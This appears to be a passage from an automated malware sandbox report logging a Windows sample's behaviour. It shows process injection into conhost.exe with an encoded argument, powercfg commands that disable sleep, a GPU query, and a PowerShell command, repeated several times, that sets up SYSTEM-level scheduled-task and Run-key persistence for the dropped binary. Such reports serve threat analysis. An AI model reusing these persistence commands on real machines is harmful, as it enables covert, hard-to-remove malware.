                        Source: C:\Program Files\xjfgcnhmcvxy.exeMemory written: C:\Windows\System32\conhost.exe base: CB2F06C010Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GQFENPELJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe xcgkmjxjdowqJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe gzssianthtxzdggz 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvug8Rp3hiani4Twfqfj5pfOQ4C5/lIR+WrKX/39lFBfrYgVA5xlELaQrgfEYI/1+l+sm6d1wY+jp8lQ+gyInBZtRryf27JkgwVg8+gc8zt/+Qw/FqR21gXGsiWp5M1/PaUO8B8L/yFa9vhQOOMQzU9osOZwr+lVWCnvU0S6ajO3l3PA+IO3tZ+KIHzg9oJDykmRT9FPoLVpg3f2E+S/d4wYAneGaTBaw9u+h7ySSQW4uLa2RdrQlsNvaothGQq4OkU9/7weTT4gwdlFYcJqzkf6CrPgHCU2Z2X/1LqnGA0Z/oGM3RQZ3KFMH6aI6u72Mx/Roo9xz5ogo8pI2aMP1z57eBCyYbXyiGT0rCG540iwNf53KRDw5r+qu9TX7DnABrUnuCbtJtyaOErrfhHdH0mzc3oHhwbzk+xXdFEnj5LezfN80ibSpckaUWKu/Nc8n5n3862TFcZoV3+5pG7wnvACa9eswJk6IY7ANEpRFN9HJzRPurRT3aTK7NgnMwc4gmU=Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ubqexh#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gqfenpel' /tr '''c:\program files\xjfgcnhmcvxy.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\xjfgcnhmcvxy.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gqfenpel' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "gqfenpel" /t reg_sz /f /d 'c:\program files\xjfgcnhmcvxy.exe' }
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydxtfs#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "gqfenpel" } else { "c:\program files\xjfgcnhmcvxy.exe" }
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ubqexh#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gqfenpel' /tr '''c:\program files\xjfgcnhmcvxy.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\xjfgcnhmcvxy.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gqfenpel' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "gqfenpel" /t reg_sz /f /d 'c:\program files\xjfgcnhmcvxy.exe' }
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe c:\windows\system32\conhost.exe gzssianthtxzdggz 6e3sjfzq2rjqaxvlpmxgsbl6xjjyguhwtopz+stidvug8rp3hiani4twfqfj5pfoq4c5/lir+wrkx/39lfbfrygva5xlelaqrgfeyi/1+l+sm6d1wy+jp8lq+gyinbztrryf27jkgwvg8+gc8zt/+qw/fqr21gxgsiwp5m1/pauo8b8l/yfa9vhqoomqzu9osozwr+lvwcnvu0s6ajo3l3pa+io3tz+kihzg9ojdykmrt9fpolvpg3f2e+s/d4wyanegatbaw9u+h7yssqw4ula2rdrqlsnvaothgqq4oku9/7wett4gwdlfycjqzkf6crpghcu2z2x/1lqnga0z/ogm3rqz3kfmh6ai6u72mx/roo9xz5ogo8pi2amp1z57ebcyybxyigt0rcg540iwnf53krdw5r+qu9tx7dnabrunucbtjtyaoerrfhhdh0mzc3ohhwbzk+xxdfenj5lezfn80ibspckauwku/nc8n5n3862tfczov3+5pg7wnvaca9eswjk6iy7aneprfn9hjzrpurrt3atk7ngnmwc4gmu=
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ubqexh#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gqfenpel' /tr '''c:\program files\xjfgcnhmcvxy.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\xjfgcnhmcvxy.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gqfenpel' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "gqfenpel" /t reg_sz /f /d 'c:\program files\xjfgcnhmcvxy.exe' }Jump to behavior
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydxtfs#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { schtasks /run /tn "gqfenpel" } else { "c:\program files\xjfgcnhmcvxy.exe" }Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ubqexh#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gqfenpel' /tr '''c:\program files\xjfgcnhmcvxy.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\xjfgcnhmcvxy.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gqfenpel' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "gqfenpel" /t reg_sz /f /d 'c:\program files\xjfgcnhmcvxy.exe' }Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe c:\windows\system32\conhost.exe gzssianthtxzdggz 6e3sjfzq2rjqaxvlpmxgsbl6xjjyguhwtopz+stidvug8rp3hiani4twfqfj5pfoq4c5/lir+wrkx/39lfbfrygva5xlelaqrgfeyi/1+l+sm6d1wy+jp8lq+gyinbztrryf27jkgwvg8+gc8zt/+qw/fqr21gxgsiwp5m1/pauo8b8l/yfa9vhqoomqzu9osozwr+lvwcnvu0s6ajo3l3pa+io3tz+kihzg9ojdykmrt9fpolvpg3f2e+s/d4wyanegatbaw9u+h7yssqw4ula2rdrqlsnvaothgqq4oku9/7wett4gwdlfycjqzkf6crpghcu2z2x/1lqnga0z/ogm3rqz3kfmh6ai6u72mx/roo9xz5ogo8pi2amp1z57ebcyybxyigt0rcg540iwnf53krdw5r+qu9tx7dnabrunucbtjtyaoerrfhhdh0mzc3ohhwbzk+xxdfenj5lezfn80ibspckauwku/nc8n5n3862tfczov3+5pg7wnvaca9eswjk6iy7aneprfn9hjzrpurrt3atk7ngnmwc4gmu=Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
